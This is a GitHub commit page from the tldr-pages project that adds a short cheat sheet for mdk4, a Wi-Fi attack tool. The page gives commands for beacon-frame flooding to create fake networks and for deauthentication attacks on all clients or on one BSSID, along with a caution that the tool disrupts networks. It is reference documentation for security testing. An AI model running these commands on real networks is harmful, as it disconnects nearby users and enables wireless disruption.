1
0
Fork 0
mirror of https://github.com/tldr-pages/tldr.git synced 2025-06-07 23:26:00 +02:00

mdk4: add page (#16688)

* mdk4: add page

* mdk4: update placeholders

---------

Co-authored-by: Machiavelli <145562237+MachiavelliII@users.noreply.github.com>
This commit is contained in:
Fazle Arefin 2025-06-02 09:11:29 +10:00 committed by GitHub
parent c528eed4bd
commit 0439e28114
No known key found for this signature in database
GPG key ID: B5690EEEBB952194

18
pages/common/mdk4.md Normal file
View file

@ -0,0 +1,18 @@
# mdk4
> A proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses.
> Note: Exercise extreme caution as this tool can disrupt WiFi networks and disconnect nearby users.
> See also: `airodump-ng`, `airmon-ng`.
> More information: <https://github.com/aircrack-ng/mdk4>.
- Flood access points with beacon frames to create fake networks (set interface to monitor mode with `sudo airmon-ng start <wifi_interface>` if needed):
`sudo mdk4 {{wifi_interface}} b -f {{path/to/beacons.txt}}`
- Perform deauthentication attack against all clients on all BSSIDs:
`sudo mdk4 {{wifi_interface}} d`
- Perform deauthentication attack on a specific BSSID (list BSSIDs using `sudo airodump-ng <wifi_interface>`):
`sudo mdk4 {{wifi_interface}} d -B {{BSSID}}`